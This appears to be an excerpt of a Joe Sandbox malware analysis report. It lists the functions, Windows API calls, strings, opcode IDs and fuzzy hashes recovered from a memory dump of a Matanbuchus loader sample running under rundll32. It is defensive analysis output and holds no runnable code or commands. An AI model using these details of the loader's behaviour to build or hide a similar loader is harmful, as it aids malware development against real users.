                                                                  • Instruction Fuzzy Hash: 37513FB4E04388CFDB14DFA9C4806ADBBB5BF1A304F5081A9D858AB351E7340A81DFA1
                                                                  APIs
                                                                  • std::bad_exception::bad_exception.LIBCMTD ref: 7FB33EFF
                                                                  • std::bad_exception::bad_exception.LIBCMTD ref: 7FB33F19
                                                                  • std::bad_exception::bad_exception.LIBCMTD ref: 7FB33F33
                                                                  • std::bad_exception::bad_exception.LIBCMTD ref: 7FB33F4D
                                                                  Strings
                                                                  • false, xrefs: 7FB33F6E
                                                                  • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7FB33F69
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: std::bad_exception::bad_exception
                                                                  • String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
                                                                  • API String ID: 2160870905-4036550669
                                                                  • Opcode ID: 4b24d0b11604b5755577e9fa6b24094dd3555078b5cda486ce80755bdfe39d6b
                                                                  • Instruction ID: 21899ed27e0b66ff3307576f8aef1106640e9c476cd25c99af75524d2c5e9356
                                                                  • Opcode Fuzzy Hash: 4b24d0b11604b5755577e9fa6b24094dd3555078b5cda486ce80755bdfe39d6b
                                                                  • Instruction Fuzzy Hash: 96212E71A00308EBCB08CFA4D980DEE77B6FF85300F18855AF5616B254EF35BA199B61
                                                                  APIs
                                                                  • std::bad_exception::bad_exception.LIBCMTD ref: 7FB33DDF
                                                                  • std::bad_exception::bad_exception.LIBCMTD ref: 7FB33DF9
                                                                  • std::bad_exception::bad_exception.LIBCMTD ref: 7FB33E13
                                                                  • std::bad_exception::bad_exception.LIBCMTD ref: 7FB33E2D
                                                                  Strings
                                                                  • false, xrefs: 7FB33E4E
                                                                  • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7FB33E49
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: std::bad_exception::bad_exception
                                                                  • String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
                                                                  • API String ID: 2160870905-4036550669
                                                                  • Opcode ID: 8c759d9286f41efb964c4f1a659a2894b01ba0f32b90f1ea63650790dc6c60a0
                                                                  • Instruction ID: 6248afa18b8e6865a111ee17a757d62da61b90a4d56d42970cfb3e1746da0baf
                                                                  • Opcode Fuzzy Hash: 8c759d9286f41efb964c4f1a659a2894b01ba0f32b90f1ea63650790dc6c60a0
                                                                  • Instruction Fuzzy Hash: AA213071A00308EBCB04DFA4D990DEE77B6FF84300F188559F5616B254EF35BA199B60
                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(00000000,?,7FB5413B,7FB51108,0000000C,7FB652A0,00000000,00000000,?,7FB54388,00000021,FlsSetValue,7FB6D860,7FB6D868,7FB652A0), ref: 7FB540EF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FreeLibrary
                                                                  • String ID: api-ms-$ext-ms-
                                                                  • API String ID: 3664257935-537541572
                                                                  • Opcode ID: 7e3f73a4493493da840308c71b3181dd3fabcba5c62722f31afe05d14ab2e1db
                                                                  • Instruction ID: 95307aff2b804154a056a61bfd9ae41c7d06c337a2d38ef7b894b29c69e2ef87
                                                                  • Opcode Fuzzy Hash: 7e3f73a4493493da840308c71b3181dd3fabcba5c62722f31afe05d14ab2e1db
                                                                  • Instruction Fuzzy Hash: BB21E176515311E7D7225A62EC50B5B7779DB41370F380211ED17EB180EB74F919C6D0
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322575419.000000006C311000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C310000, based on PE: true
                                                                  • Associated: 00000005.00000002.3322561944.000000006C310000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000005.00000002.3322600793.000000006C34B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000005.00000002.3322617432.000000006C35A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000005.00000002.3322682909.000000006C56D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000005.00000002.3322765446.000000006C807000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000005.00000002.3322781439.000000006C808000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6c310000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID: ($8$?2$GB$r
                                                                  • API String ID: 3472027048-435796455
                                                                  • Opcode ID: 90ae36de3acc1ae9ec5001ba49800af601560616872761a8ec9232cde0bbd8c7
                                                                  • Instruction ID: 0dce9efd687f4f72a2f45f81da17d6c8d22388305ecf0aa9f289a5dcbc57d315
                                                                  • Opcode Fuzzy Hash: 90ae36de3acc1ae9ec5001ba49800af601560616872761a8ec9232cde0bbd8c7
                                                                  • Instruction Fuzzy Hash: BB914B70E052A8DFDF10CFA8D4806EDBFB9BB0A314F50819AE058AB345D7385A44DFA5
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 7FB40525
                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 7FB40590
                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 7FB405AD
                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 7FB405EC
                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 7FB4064B
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 7FB4066E
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ByteCharMultiStringWide
                                                                  • String ID:
                                                                  • API String ID: 2829165498-0
                                                                  • Opcode ID: 3df995bddea341a3b3a660868883b315bffdb48493681c89b4a425d04a551cde
                                                                  • Instruction ID: e059d4b53454db1ecef4477fb856239edc061a166d01045996e8f2ae9b88619a
                                                                  • Opcode Fuzzy Hash: 3df995bddea341a3b3a660868883b315bffdb48493681c89b4a425d04a551cde
                                                                  • Instruction Fuzzy Hash: AB51A0B2910306AFEF114F65DE44FBA3BB9EF84790F214129F916DB190EB349811EB60
                                                                  APIs
                                                                  • GetLastError.KERNEL32(00000001,?,7FB43D62,7FB408DB,7FB40DD0,?,7FB41008,?,00000001,?,?,00000001,?,7FB76318,0000000C,7FB41101), ref: 7FB43E51
                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 7FB43E5F
                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 7FB43E78
                                                                  • SetLastError.KERNEL32(00000000,7FB41008,?,00000001,?,?,00000001,?,7FB76318,0000000C,7FB41101,?,00000001,?), ref: 7FB43ECA
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLastValue___vcrt_
                                                                  • String ID:
                                                                  • API String ID: 3852720340-0
                                                                  • Opcode ID: f1fa2cec278297fc6a5708b8466208a4250123cdc3b1cb9045483f9c0ac57a9f
                                                                  • Instruction ID: 71559011c4ccf9911135c14f4b358cb8616bc0e2ae4a006769db8660f39b98dc
                                                                  • Opcode Fuzzy Hash: f1fa2cec278297fc6a5708b8466208a4250123cdc3b1cb9045483f9c0ac57a9f
                                                                  • Instruction Fuzzy Hash: 6201F57B10B7115DE76A1972BEC0ABB26A4EB015B073C232AF5118A1D0EF525816F1B1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322575419.000000006C311000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C310000, based on PE: true
                                                                  • Associated: 00000005.00000002.3322561944.000000006C310000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000005.00000002.3322600793.000000006C34B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000005.00000002.3322617432.000000006C35A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000005.00000002.3322682909.000000006C56D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000005.00000002.3322765446.000000006C807000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000005.00000002.3322781439.000000006C808000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6c310000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: *$8$TMP
                                                                  • API String ID: 0-2442449778
                                                                  • Opcode ID: f16556f3842806dd09c0763feb36b38f389c93b0cbf0c91d0dd9429987922242
                                                                  • Instruction ID: 12dd3483726dd427884515d38d63264ed30ad5083bff53c5c21f66fc5aeba9b9
                                                                  • Opcode Fuzzy Hash: f16556f3842806dd09c0763feb36b38f389c93b0cbf0c91d0dd9429987922242
                                                                  • Instruction Fuzzy Hash: D0E105B4E15268CFDB54CF69C890BADBBF9FB8A304F50819AD448A7350D7345A80EF61
                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(000000F4,?,00003C16), ref: 7FB4F265
                                                                  • GetFileType.KERNEL32(00000000,?,00003C16), ref: 7FB4F277
                                                                  • swprintf.LIBCMT ref: 7FB4F298
                                                                  • WriteConsoleW.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,00003C16), ref: 7FB4F2D5
                                                                  Strings
                                                                  • Assertion failed: %Ts, file %Ts, line %d, xrefs: 7FB4F28D
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ConsoleFileHandleTypeWriteswprintf
                                                                  • String ID: Assertion failed: %Ts, file %Ts, line %d
                                                                  • API String ID: 2943507729-1719349581
                                                                  • Opcode ID: abb2259bc6187fafa4da61b430b4c8751e046360ab764d4a83a03fa7a4c9e4bc
                                                                  • Instruction ID: 301884c7a82fd4f3994674a315ca26439b891ad63d711fb9ba5b5de65fbdd22e
                                                                  • Opcode Fuzzy Hash: abb2259bc6187fafa4da61b430b4c8751e046360ab764d4a83a03fa7a4c9e4bc
                                                                  • Instruction Fuzzy Hash: D2110B7A9002146BCB209B29DD45AEE77BDEF44320F604559F926DB084EA30BD46CB54
                                                                  APIs
                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,984F0B0D,7FB652A0,?,00000000,7FB63C13,000000FF,?,7FB5077A,7D83FC4D,?,7FB5074E,7FB652A0), ref: 7FB5081F
                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 7FB50831
                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,7FB63C13,000000FF,?,7FB5077A,7D83FC4D,?,7FB5074E,7FB652A0), ref: 7FB50853
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                  • API String ID: 4061214504-1276376045
                                                                  • Opcode ID: 27399f223f8c08c6967f6a426ffeca41b4fd5396a1cdce8e7376a49dd866ccee
                                                                  • Instruction ID: f2da0d33292c241a08e16a9e4047f236c1089fea1332c681a43a8f01dff88bcc
                                                                  • Opcode Fuzzy Hash: 27399f223f8c08c6967f6a426ffeca41b4fd5396a1cdce8e7376a49dd866ccee
                                                                  • Instruction Fuzzy Hash: F601A236910615AFDB219F52DC05FAEBBB8FB04725F140226FC13AB6C0EB789800CB90
                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 7FAF5947
                                                                  • int.LIBCPMTD ref: 7FAF5960
                                                                    • Part of subcall function 7FAFAA20: std::_Lockit::_Lockit.LIBCPMT ref: 7FAFAA36
                                                                    • Part of subcall function 7FAFAA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7FAFAA60
                                                                  • Concurrency::cancel_current_task.LIBCPMTD ref: 7FAF59A7
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 7FAF5A3B
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                                  • String ID:
                                                                  • API String ID: 3053331623-0
                                                                  • Opcode ID: ab7b43d43114c16608704aee8f01f0b3387ab8988e841b86762880f5728b611b
                                                                  • Instruction ID: 0ff9d0a35780f966dd2cc21bcc63cec1f4fe0f35ba573b9b5afbccf06091fd34
                                                                  • Opcode Fuzzy Hash: ab7b43d43114c16608704aee8f01f0b3387ab8988e841b86762880f5728b611b
                                                                  • Instruction Fuzzy Hash: 194197B8D10609DFCF04DF94D581AEEBBB5FF48310F208259E925A7394D734AA45CBA1
                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 7FAF5807
                                                                  • int.LIBCPMTD ref: 7FAF5820
                                                                    • Part of subcall function 7FAFAA20: std::_Lockit::_Lockit.LIBCPMT ref: 7FAFAA36
                                                                    • Part of subcall function 7FAFAA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7FAFAA60
                                                                  • Concurrency::cancel_current_task.LIBCPMTD ref: 7FAF5867
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 7FAF58FB
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                                  • String ID:
                                                                  • API String ID: 3053331623-0
                                                                  • Opcode ID: fcb86ccf09f6a8e6a2dc071dc9c3f6bc71540189595cfc1b6759e93b59b24e03
                                                                  • Instruction ID: b19695e93dc3096f3f1048f88e07a829215e4215c148ed97e4ea5509e5f4d110
                                                                  • Opcode Fuzzy Hash: fcb86ccf09f6a8e6a2dc071dc9c3f6bc71540189595cfc1b6759e93b59b24e03
                                                                  • Instruction Fuzzy Hash: 834196B8D00609DFCB04DF94D980AEEFBB5FF48310F204259E925AB394D734AA45CBA1
                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 7FAF56C7
                                                                  • int.LIBCPMTD ref: 7FAF56E0
                                                                    • Part of subcall function 7FAFAA20: std::_Lockit::_Lockit.LIBCPMT ref: 7FAFAA36
                                                                    • Part of subcall function 7FAFAA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7FAFAA60
                                                                  • Concurrency::cancel_current_task.LIBCPMTD ref: 7FAF5727
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 7FAF57BB
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                                  • String ID:
                                                                  • API String ID: 3053331623-0
                                                                  • Opcode ID: 72099d35c5e61102effb5de175d4399e5f42d4e14f8bc3f1459ef025f9708466
                                                                  • Instruction ID: 57f438b2253961330d163dee1bc396adfaa4c85267aa013d71aade2402f7d3f4
                                                                  • Opcode Fuzzy Hash: 72099d35c5e61102effb5de175d4399e5f42d4e14f8bc3f1459ef025f9708466
                                                                  • Instruction Fuzzy Hash: 6F4196B8D00609DFCB04DF94D990AEEBBB5FF48310F204659E825A7394D734AA45CFA1
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 7FB3FDAB
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 7FB3FDB6
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 7FB3FE24
                                                                    • Part of subcall function 7FB3FF07: std::locale::_Locimp::_Locimp.LIBCPMT ref: 7FB3FF1F
                                                                  • std::locale::_Setgloballocale.LIBCPMT ref: 7FB3FDD1
                                                                  • _Yarn.LIBCPMT ref: 7FB3FDE7
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                  • String ID:
                                                                  • API String ID: 1088826258-0
                                                                  • Opcode ID: 06f5026f576cfa39c98eaa2bd85438098e51670e422f1e6c6141f39c77a8179e
                                                                  • Instruction ID: 1d89440648ff6ecca6258d966cdfbd0098754c9a9949c07353c15a12bdd95ddb
                                                                  • Opcode Fuzzy Hash: 06f5026f576cfa39c98eaa2bd85438098e51670e422f1e6c6141f39c77a8179e
                                                                  • Instruction Fuzzy Hash: 390175BAE40611ABCB0ADF11E44067D7775FF85220B684049DC1157384DF747E06DB81
                                                                  APIs
                                                                  • LoadLibraryExA.KERNEL32(advapi32,00000000,00000008), ref: 7FB14841
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID: MNo name attribute $advapi32$Operation
                                                                  • API String ID: 1029625771-688042845
                                                                  • Opcode ID: 2b5e0edeebb9716d25595bee256d32c929b425a40ff3d68843edc3216fba7ff6
                                                                  • Instruction ID: 3b9e3f083f4a681c1944be0600e0889e85b8551f35bc9c1d9a4b2022bdf99b2b
                                                                  • Opcode Fuzzy Hash: 2b5e0edeebb9716d25595bee256d32c929b425a40ff3d68843edc3216fba7ff6
                                                                  • Instruction Fuzzy Hash: 9091D479908268CFDB25CF66D8907EDBBF5FB49314F2481DAD449A7280E3349A91CF20
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __freea
                                                                  • String ID: 9E(j
                                                                  • API String ID: 240046367-705430000
                                                                  • Opcode ID: 45b933ef11f3e6a2045b56b8ac843207e403bd23a1a55ec0f3e937a65068e751
                                                                  • Instruction ID: f0014156ef930ef886f593313f2147cac2f95cf8222bebe13e14eaf8f95e70c5
                                                                  • Opcode Fuzzy Hash: 45b933ef11f3e6a2045b56b8ac843207e403bd23a1a55ec0f3e937a65068e751
                                                                  • Instruction Fuzzy Hash: 5C5173B272131AAFEB118E60BD44EEB3AA9EF44254B310169FD0AD7150FA68DE109760
                                                                  APIs
                                                                  • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 7FB3F3F5
                                                                  • CloseHandle.KERNEL32(?), ref: 7FB3F49F
                                                                  • CloseHandle.KERNEL32(00000000), ref: 7FB3F4A9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseHandle$CreateProcess
                                                                  • String ID: ?
                                                                  • API String ID: 2922976086-1684325040
                                                                  • Opcode ID: 658c394e447bf85513cf8bbfaa6b6b5b8cdbcdd2e57af3b4f72677ad8b6666a7
                                                                  • Instruction ID: 05df2dfeeb080fce3aa9b63ad5c618713f1ff493588eac195d63b0d3165622f6
                                                                  • Opcode Fuzzy Hash: 658c394e447bf85513cf8bbfaa6b6b5b8cdbcdd2e57af3b4f72677ad8b6666a7
                                                                  • Instruction Fuzzy Hash: 4F21D671D40319BFDF298A96EC44EEF7B7DEFC4710F904069F925A5090E731AA14CA60
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,7FB44F43,00000000,?,00000001,?,?,?,7FB45032,00000001,FlsFree,7FB6ADFC,FlsFree), ref: 7FB44F9F
                                                                  • GetLastError.KERNEL32(?,7FB44F43,00000000,?,00000001,?,?,?,7FB45032,00000001,FlsFree,7FB6ADFC,FlsFree,00000000,?,7FB43F4F), ref: 7FB44FA9
                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 7FB44FD1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad$ErrorLast
                                                                  • String ID: api-ms-
                                                                  • API String ID: 3177248105-2084034818
                                                                  • Opcode ID: d7e36984da6a9217a020d870f2f63ceb3503bff2fc8e11fcb582c4ffad48d098
                                                                  • Instruction ID: 7a23007d21a996b18be7c0b188ac44ad2809a8c0e4b2880721b457b0093c81dc
                                                                  • Opcode Fuzzy Hash: d7e36984da6a9217a020d870f2f63ceb3503bff2fc8e11fcb582c4ffad48d098
                                                                  • Instruction Fuzzy Hash: 44E04875654304F7DB111EA2ED06F593A65EB10761F345020FD0FED4D0EF61E531AA94
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlRandomEx,?,7FB3F717,?,?,?,7FB3EF6C,?,0000000F,?,00000000,00000208), ref: 7FB3F946
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 7FB3F94D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: RtlRandomEx$ntdll.dll
                                                                  • API String ID: 1646373207-4284430886
                                                                  • Opcode ID: cc5ae48925dec478c4380c193be931f303bba2593d2f600118aac0e4d0945a8b
                                                                  • Instruction ID: 05da86ac122611c501a8bd9d978d0bd4bf9f1ad820c929d893b8a3b1ef9c19c1
                                                                  • Opcode Fuzzy Hash: cc5ae48925dec478c4380c193be931f303bba2593d2f600118aac0e4d0945a8b
                                                                  • Instruction Fuzzy Hash: DED09E3E5503046BDA205BF7D948A253B6DDB055253240554BD0DCA140DB24A9699B50
                                                                  APIs
                                                                  • GetConsoleOutputCP.KERNEL32(984F0B0D,?,00000000,?), ref: 7FB5B7E6
                                                                    • Part of subcall function 7FB5772F: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,7FB5C176,0000FDE9,00000000,?,?,?,7FB5BEB7,0000FDE9,00000000,?), ref: 7FB577DB
                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 7FB5BA41
                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 7FB5BA89
                                                                  • GetLastError.KERNEL32 ref: 7FB5BB2C
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                  • String ID:
                                                                  • API String ID: 2112829910-0
                                                                  • Opcode ID: 722e0ad83fac60f0098e34efdd6949b5fb7f5f482df6b4bc7897b479eb4b7aa8
                                                                  • Instruction ID: 7c6989d799bccb7a12fb122f59119595e4ae7dead6ddcf8be0e4df9996c70d06
                                                                  • Opcode Fuzzy Hash: 722e0ad83fac60f0098e34efdd6949b5fb7f5f482df6b4bc7897b479eb4b7aa8
                                                                  • Instruction Fuzzy Hash: FAD15CB5D002589FDF01CFA8D880AEDBBB5FF49310F14812AE866EB355E734A942CB50
                                                                  APIs
                                                                    • Part of subcall function 7FB5772F: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,7FB5C176,0000FDE9,00000000,?,?,?,7FB5BEB7,0000FDE9,00000000,?), ref: 7FB577DB
                                                                  • GetLastError.KERNEL32 ref: 7FB57AE5
                                                                  • __dosmaperr.LIBCMT ref: 7FB57AEC
                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 7FB57B26
                                                                  • __dosmaperr.LIBCMT ref: 7FB57B2D
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                  • String ID:
                                                                  • API String ID: 1913693674-0
                                                                  • Opcode ID: 77e7763edbd754741a965e1710c250454f6e5abaa4f4ccf28ba32098ac21b4ed
                                                                  • Instruction ID: c8d46642401bb5c5704159db0a59e51604e518015842e8154e27d6e1128ea240
                                                                  • Opcode Fuzzy Hash: 77e7763edbd754741a965e1710c250454f6e5abaa4f4ccf28ba32098ac21b4ed
                                                                  • Instruction Fuzzy Hash: 2B21C8B5710709AFD7119FB2EC9095BB7BAFF002647348618E8159B150E734FE0197A0
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9bd235da9974b8626917709ef424296ad5b5308add0da0d8e27ee1283583f50c
                                                                  • Instruction ID: fd3226bf37fe7ef92e8ee98bdfdbf1072b61228c5bdd0023146b4d8a8de14d61
                                                                  • Opcode Fuzzy Hash: 9bd235da9974b8626917709ef424296ad5b5308add0da0d8e27ee1283583f50c
                                                                  • Instruction Fuzzy Hash: D021C0B1606309BFDB119F71EE809AB77AAEF462647109624FC35CB180EB30FC01A760
                                                                  APIs
